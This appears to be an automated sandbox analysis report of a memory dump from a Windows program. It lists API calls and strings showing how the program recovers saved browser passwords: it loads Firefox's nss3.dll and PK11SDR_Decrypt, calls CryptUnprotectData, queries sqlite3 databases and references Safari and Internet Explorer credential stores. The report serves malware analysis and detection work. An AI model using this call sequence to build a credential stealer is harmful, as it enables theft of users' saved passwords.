• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: PrivateProfile$StringWrite_itowmemset
• String ID:
• API String ID: 4232544981-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041139E: LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
  • Part of subcall function 0041139E: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
  • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
  • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
  • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
  • Part of subcall function 0041139E: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
• K32GetModuleFileNameExW.KERNEL32(00000104,00000000,0041126B,00000104,0041126B,00000000,?), ref: 00411395
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$FileLibraryLoadModuleName
• String ID:
• API String ID: 3821362017-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040C605,00000000,00448B84,00000002,?,?,?,0040E2DC,00000000), ref: 00407BC9
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileWrite
• String ID:
• API String ID: 3934441357-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindClose.KERNELBASE(?,004083EE,?,00000000,00000000,?,00410708,?), ref: 004084E4
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FreeLibrary.KERNELBASE(?,00409EC4,00000000,004101A5,?,?,?,?,?,0040328B,?), ref: 004117EF
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• EnumResourceNamesW.KERNELBASE(?,?,00411EF8,00000000), ref: 00411F8D
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: EnumNamesResource
• String ID:
• API String ID: 3334572018-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(?,0040A987,?,0040AA3E,00000000,?,00000000,00000208,?), ref: 0040754C
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
  • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
• free.MSVCRT(?,00000000,?,00000000), ref: 004082B2
  • Part of subcall function 00408001: free.MSVCRT(?,00000000,?,004082EE,00000000,?,00000000), ref: 00408010
  • Part of subcall function 00407475: malloc.MSVCRT ref: 00407491
  • Part of subcall function 00407475: memcpy.MSVCRT ref: 004074A9
  • Part of subcall function 00407475: free.MSVCRT(00000000,00000000,?,00408025,00000002,?,00000000,?,004082EE,00000000,?,00000000), ref: 004074B2
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: free$mallocmemcpy
• String ID:
• API String ID: 3401966785-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408604: ??3@YAXPAX@Z.MSVCRT ref: 0040860B
• ??2@YAPAXI@Z.MSVCRT ref: 004085F4
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
Memory Dump Source
• Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
                                                  • Opcode ID: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                  • Instruction ID: cac01d1bc301b84fbdbddb48431dcac5afc2edf88536e2650f831a4bf4b80b8a
                                                  • Opcode Fuzzy Hash: 12e10aa5a455c2b2122ca5546f3d5514bdec465a3aa4be4c1af19d6b195196c9
                                                  • Instruction Fuzzy Hash: 7AC00272550B019FF7609F15C94A762B3E4AF5077BF918C1DA4A5924C1E7BCD4448A18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: free
                                                  • String ID:
                                                  • API String ID: 1294909896-0
                                                  • Opcode ID: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                  • Instruction ID: 46b4f55e9d8111901284769a6e1cf788246b5727949f953e2d9518689c8df02f
                                                  • Opcode Fuzzy Hash: b450fec74f7795ac9fca528e737bf449a82a962f0464f52a5a7c386dc31c5c02
                                                  • Instruction Fuzzy Hash: AC900282455501216C4522755D1750511080851176374074A7032A59D1DE688150601C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 00415B06
                                                    • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B2D
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00415B56
                                                  • LocalFree.KERNEL32(?), ref: 00415B71
                                                  • free.MSVCRT(?,0044A338,?), ref: 00415B9F
                                                    • Part of subcall function 00414C63: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74B05970,?,00414D8E,?), ref: 00414C81
                                                    • Part of subcall function 00414C63: malloc.MSVCRT ref: 00414C88
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 2360000266-2664311388
                                                  • Opcode ID: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                  • Instruction ID: b695a5953d892c14765524e538430075cec87daac3f875befcc4cde39e80dde6
                                                  • Opcode Fuzzy Hash: b92bfb85b135c96f8b850ddecf84185ea98de4423d487b3975f43b970985a80a
                                                  • Instruction Fuzzy Hash: 5F118E34A00218BBDB21AFA19C49CDFBF78EF85B51B104067F405A2250D6795B809BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00407E26
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00407E45
                                                  • FindClose.KERNEL32(00000000), ref: 00407E65
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID: .$ld@$nss3.dll
                                                  • API String ID: 3541575487-3654816495
                                                  • Opcode ID: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                  • Instruction ID: 78963b1eb2bf7b5f8aa15039180698213c9a680973a94e339c68aae197af375e
                                                  • Opcode Fuzzy Hash: cc7230da910be55964706480e184fd4a449cc4274279a5797c2cb2fba6568da8
                                                  • Instruction Fuzzy Hash: CEF0BB75901528ABDB206BB4DC8C9ABB7ACEB45765F0401B2ED06E3180D334AE458AD9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 00402201
                                                  • _wcsicmp.MSVCRT ref: 00402231
                                                  • _wcsicmp.MSVCRT ref: 0040225E
                                                  • _wcsicmp.MSVCRT ref: 0040228B
                                                    • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                    • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                  • memset.MSVCRT ref: 0040262F
                                                  • memcpy.MSVCRT ref: 00402664
                                                    • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
                                                    • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
                                                    • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
                                                  • memcpy.MSVCRT ref: 004026C0
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,00000090,00000000,?), ref: 0040271E
                                                  • FreeLibrary.KERNEL32(00000000,?,00000090,00000000,?), ref: 0040272D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmp$FreeLibrarymemcpy$AddressLoadLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 462158748-1134094380
                                                  • Opcode ID: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                  • Instruction ID: cc44404655acc20b5533cc0c34fbbab0c7f11d0fd0cfcd5d05bb593c6a12ed59
                                                  • Opcode Fuzzy Hash: 67cf4eee38665e4ec1be56c90270dd44ce6e0e009cbb4a5b7d9f17bd5b1e0b61
                                                  • Instruction Fuzzy Hash: C9F1FF208087E9C9DB32D7788D097CEBE645B23324F0443D9E1E87A2D2D7B55B85CB66
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004419A0
                                                  • wcscpy.MSVCRT ref: 004419B7
                                                  • memset.MSVCRT ref: 004419EA
                                                  • wcscpy.MSVCRT ref: 00441A00
                                                  • wcscat.MSVCRT ref: 00441A11
                                                  • wcscpy.MSVCRT ref: 00441A37
                                                  • wcscat.MSVCRT ref: 00441A48
                                                  • wcscpy.MSVCRT ref: 00441A6F
                                                  • wcscat.MSVCRT ref: 00441A80
                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441A8F
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000104,00000000), ref: 00441AA6
                                                  • LoadLibraryW.KERNEL32(sqlite3.dll,?,00000104,00000000), ref: 00441AB9
                                                  • LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000104,00000000), ref: 00441AC7
                                                  • LoadLibraryW.KERNEL32(nss3.dll,?,00000104,00000000), ref: 00441AD7
                                                  • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00441AF3
                                                  • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00441AFF
                                                  • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00441B0C
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00441B19
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00441B26
                                                  • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00441B33
                                                  • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00441B40
                                                  • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00441B4D
                                                  • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00441B5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
                                                  • String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                  • API String ID: 2522319644-522817110
                                                  • Opcode ID: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                  • Instruction ID: 320c17c5e6ace6947bedab1e2bf77c9c6d077df099d9b5840aba930edb5fc244
                                                  • Opcode Fuzzy Hash: 8848e67c20b1512477d94237df3342a95449e5598eedc60463cf29981b84716b
                                                  • Instruction Fuzzy Hash: 855165B1901709BADB20FFB18D49A4BB7F8AF08704F5008ABE54AE2551E778E644CF18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$dpapi:$ftp://$http://$https://$internet explorer$wininetcachecredentials
                                                  • API String ID: 2787044678-1843504584
                                                  • Opcode ID: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                  • Instruction ID: bbe16b9e6473d86cc6eed57c0ed50d6d6787e5e5d2f3b2995f82d19aea11410f
                                                  • Opcode Fuzzy Hash: cb6674861b630e023730bc8514c911496a266ea8c7e3a43a84e29182814d6b93
                                                  • Instruction Fuzzy Hash: 2891A571940209BFEF20EF55CD41EDF77A8AF54314F10006AF848A3292EB79EE508B68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32 ref: 00411421
                                                  • GetDlgItem.USER32 ref: 0041142D
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041143C
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00411448
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 00411451
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041145D
                                                  • GetWindowRect.USER32 ref: 0041146F
                                                  • GetWindowRect.USER32 ref: 0041147A
                                                  • MapWindowPoints.USER32 ref: 0041148E
                                                  • MapWindowPoints.USER32 ref: 0041149C
                                                  • GetDC.USER32 ref: 004114D5
                                                  • wcslen.MSVCRT ref: 00411515
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00411526
                                                  • ReleaseDC.USER32 ref: 00411573
                                                  • _snwprintf.MSVCRT ref: 00411636
                                                  • SetWindowTextW.USER32(?,?), ref: 0041164A
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00411668
                                                  • GetDlgItem.USER32 ref: 0041169E
                                                  • GetWindowRect.USER32 ref: 004116AE
                                                  • MapWindowPoints.USER32 ref: 004116BC
                                                  • GetClientRect.USER32 ref: 004116D3
                                                  • GetWindowRect.USER32 ref: 004116DD
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411723
                                                  • GetClientRect.USER32 ref: 0041172D
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411765
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  • Opcode ID: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                  • Instruction ID: 8ff438caca04d900f401a49fee0f0db12add2221ca5be9c1dac879361ae65e4d
                                                  • Opcode Fuzzy Hash: 82769fcda4aee539b94f7460eafa85e4f9ca3f83dedf5f01e4882f05d4beebf3
                                                  • Instruction Fuzzy Hash: E3B1B071108341AFD720DF68C985E6BBBF9FB88704F004A2DF69692261DB75E944CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID: WebBrowserPassView
                                                  • API String ID: 829165378-2171583229
                                                  • Opcode ID: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                  • Instruction ID: 8d9c6eba8ddb3a7c26c98eaf12cf57faa7ce2db5dd3d1d54ce32cd9ff2fd20fc
                                                  • Opcode Fuzzy Hash: 9528d28c6aa400cf950dedba09aaaf40a629cdba61218975bccd681405960fd9
                                                  • Instruction Fuzzy Hash: 8C517E35500308BBDB22AF64DC45E6E7BB5FB04742F104A7AF952A66F0C774AE50EB18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  • {Unknown}, xrefs: 0040F831
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040FA0E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  • Opcode ID: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                  • Instruction ID: 69e9f0bde0ef3093fe47e3bafb281a214b560c7f74f151c34d98b156b899ddfd
                                                  • Opcode Fuzzy Hash: 4192c38ce99e2e5d3a4b6b431755b06133974f066cfd60dedb09103ebde27fd1
                                                  • Instruction Fuzzy Hash: F7719FB680121DBEEF219B50DC45EDA7B6CEF08355F0000B6F508A21A1DA799E88CF69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040FB20
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                  • memset.MSVCRT ref: 0040FB90
                                                  • wcslen.MSVCRT ref: 0040FB9D
                                                  • wcslen.MSVCRT ref: 0040FBAC
                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                  • GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                  • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                  • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                  • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                  • GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                  • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 0040FC6B
                                                  • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 0040FC77
                                                    • Part of subcall function 0040648C: memset.MSVCRT ref: 004064AD
                                                    • Part of subcall function 0040648C: memset.MSVCRT ref: 004064FA
                                                    • Part of subcall function 0040648C: RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                    • Part of subcall function 0040648C: wcscpy.MSVCRT ref: 00406642
                                                    • Part of subcall function 0040648C: ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                    • Part of subcall function 0040648C: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$memset$CurrentDirectory$LibraryLoadwcslen$CloseEnvironmentExpandHandleModuleStringswcscpy
                                                  • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                  • API String ID: 2554026968-4029219660
                                                  • Opcode ID: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                  • Instruction ID: eeb2f36212a21d3aa086fe7dd3a0485c0e35c5a93e030d286215ed8b11f998db
                                                  • Opcode Fuzzy Hash: 7b5db3b0d5bf1743c32fccddbb21aa02e391161234974de8ca04521cdbb317a2
                                                  • Instruction Fuzzy Hash: 15418371940309ABEB209F61CC85E9AB7F8BF58744F10087EE58593191EBB999848F58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcscpy$wcslen$_snwprintf$wcscat
                                                  • String ID: General$IsRelative$Path$Profile%d$profiles.ini
                                                  • API String ID: 3014334669-2600475665
                                                  • Opcode ID: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                  • Instruction ID: ca42eae1a8a54deb15ae60d9a008fbbac9316f2c57223d03809256618168ca92
                                                  • Opcode Fuzzy Hash: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                  • Instruction Fuzzy Hash: F151627290021CBADB20EB55CD45ECEB7BCAF14744F5044B7B10DA2091EB789B888F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0
                                                  • SetMenu.USER32(?,00000000), ref: 0040D2E0
                                                  • CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
                                                  • LoadImageW.USER32 ref: 0040D32F
                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
                                                  • CreateWindowExW.USER32 ref: 0040D38D
                                                  • GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
                                                  • GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
                                                  • wcslen.MSVCRT ref: 0040D47F
                                                  • wcslen.MSVCRT ref: 0040D48D
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528
                                                    • Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
                                                    • Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                  • API String ID: 1638525581-2103577948
                                                  • Opcode ID: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                  • Instruction ID: 7a0d9eec849a31f4480aab016bccc9be6ec6f6c883519ecda8bf5f9757aa8271
                                                  • Opcode Fuzzy Hash: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                  • Instruction Fuzzy Hash: D7A1A171500388AFEB11DF68CC89BCA7FA5AF55704F04447DFA486B292C7B59908CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
                                                    • Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                    • Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                    • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
                                                    • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
                                                    • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
                                                    • Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                    • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                    • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
